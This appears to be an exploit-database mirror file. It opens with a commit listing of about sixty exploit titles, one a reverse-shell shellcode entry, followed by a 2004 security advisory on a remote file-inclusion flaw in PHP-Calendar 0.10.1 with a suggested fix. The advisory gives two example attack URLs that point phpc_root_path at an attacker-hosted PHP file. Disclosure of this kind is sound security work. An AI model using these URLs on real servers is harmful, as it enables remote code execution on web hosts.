exploit-db-mirror/exploits/php/webapps/43819.txt
Offensive Security bfebc3fa5a DB: 2018-01-20
62 changes to exploits/shellcodes

macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'
Peercast < 0.1211 - Format String
Trillian Pro < 2.01 - Design Error
dbPowerAmp < 2.0/10.0 - Buffer Overflow
PsychoStats < 2.2.4 Beta - Cross Site Scripting

MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution
GitStack 2.3.10 - Unauthenticated Remote Code Execution
Invision Power Top Site List < 2.0 Alpha 3 - SQL Injection	 (PoC)
Invision Power Board (IP.Board) < 2.0 Alpha 3 - SQL Injection (PoC)
Aardvark Topsites < 4.1.0 - Multiple Vulnerabilities
DUWare Multiple Products - Multiple Vulnerabilities
AutoRank PHP < 2.0.4 - SQL Injection (PoC)
ASPapp Multiple Products - Multiple Vulnerabilities
osCommerce < 2.2-MS2 - Multiple Vulnerabilities
PostNuke < 0.726 Phoenix - Multiple Vulnerabilities
MetaDot < 5.6.5.4b5 - Multiple Vulnerabilities
phpGedView < 2.65 beta 5 - Multiple Vulnerabilities
phpShop < 0.6.1-b - Multiple Vulnerabilities
Invision Power Board (IP.Board) < 1.3 - SQL Injection
phpBB < 2.0.6d - Cross Site Scripting
Phorum < 5.0.3 Beta - Cross Site Scripting
vBulletin < 3.0.0 RC4 - Cross Site Scripting
Mambo < 4.5 - Multiple Vulnerabilities
phpBB < 2.0.7a - Multiple Vulnerabilities
Invision Power Top Site List < 1.1 RC 2 - SQL Injection
Invision Gallery < 1.0.1 - SQL Injection
PhotoPost < 4.6 - Multiple Vulnerabilities
TikiWiki < 1.8.1 - Multiple Vulnerabilities
phpBugTracker < 0.9.1 - Multiple Vulnerabilities
OpenBB < 1.0.6 - Multiple Vulnerabilities
PHPX < 3.26 - Multiple Vulnerabilities
Invision Power Board (IP.Board) < 1.3.1 - Design Error
HelpCenter Live! < 1.2.7 - Multiple Vulnerabilities
LiveWorld Multiple Products - Cross Site Scripting
WHM.AutoPilot < 2.4.6.5 - Multiple Vulnerabilities
PHP-Calendar < 0.10.1 - Arbitrary File Inclusion
PhotoPost Classifieds < 2.01 - Multiple Vulnerabilities
ReviewPost < 2.84 - Multiple Vulnerabilities
PhotoPost < 4.85 - Multiple Vulnerabilities
AZBB < 1.0.07d - Multiple Vulnerabilities
Invision Power Board (IP.Board) < 2.0.3 - Multiple Vulnerabilities
Burning Board < 2.3.1 - SQL Injection
XOOPS < 2.0.11 - Multiple Vulnerabilities
PEAR XML_RPC < 1.3.0 - Remote Code Execution
PHPXMLRPC < 1.1 - Remote Code Execution
SquirrelMail < 1.4.5-RC1 - Arbitrary Variable Overwrite
XPCOM - Race Condition
ADOdb < 4.71 - Cross Site Scripting
Geeklog < 1.4.0 - Multiple Vulnerabilities
PEAR LiveUser < 0.16.8 - Arbitrary File Access
Mambo < 4.5.3h - Multiple Vulnerabilities
phpRPC < 0.7 - Remote Code Execution
Gallery 2 < 2.0.2 - Multiple Vulnerabilities
PHPLib < 7.4 - SQL Injection
SquirrelMail < 1.4.7 - Arbitrary Variable Overwrite
CubeCart < 3.0.12 - Multiple Vulnerabilities
Claroline < 1.7.7 - Arbitrary File Inclusion
X-Cart < 4.1.3 - Arbitrary Variable Overwrite
Mambo < 4.5.4 - SQL Injection
Synology Photostation < 6.7.2-3429 - Multiple Vulnerabilities
D-Link DNS-343 ShareCenter < 1.05 - Command Injection
D-Link DNS-325 ShareCenter < 1.05B03 - Multiple Vulnerabilities

Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)
2018-01-20 05:01:49 +00:00

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PHP-Calendar Arbitrary File Inclusion
Vendor: Sean Proctor
Product: PHP-Calendar
Version: <= 0.10.1
Website: http://php-calendar.sourceforge.net/
BID: 12127
CVE: CVE-2004-1423
OSVDB: 12700 12701
SECUNIA: 22516
PACKETSTORM: 35563
Description:
I was searching for a decent calendar which my group at school could use to keep track of events, etc. We were previously using localendar, which I didn't like and it had some problems. I found CST-Calendar which did most of what I wanted, but was rather ugly and missed some features others in the group wanted. So, I gradually re-wrote CST-Calendar since that project seems to have stopped work entirely. [ As quoted from their website ]
File Include Vulnerability:
There is a very dangerous file include vulnerability in php-calendar, and making the issue even more dangerous is that I found out about php-calendar from an individual who said that php-calendar is a great open source calendar to use in php projects, and is fairly popular amongst open source php developers. This may be true, but the vulnerabilities need to be fixed if the same conditions apply as found in the original code. Below are example attack url's
http://path/includes/calendar.php?phpc_root_path=http://attacker/includes/html.php http://path/includes/setup.php?phpc_root_path=http://attacker/includes/html.php
If php globals are set to on then it is highly probable that an attacker will be able to include arbitrary php files and thus execute system commands with the rights of the web server. This can be very dangerous in some situations.
Solution:
php-calendar has a defined constant to help prevent against stuff like this. It can be seen in other php-calendar files such as db.php
if ( !defined('IN_PHPC') ) {
die("Hacking attempt");
}
Adding the following to the top of the affected pages should suffice in preventing the kinds of attacks previously mentioned in this advisory.
Credits:
James Bercegay of the GulfTech Security Research Team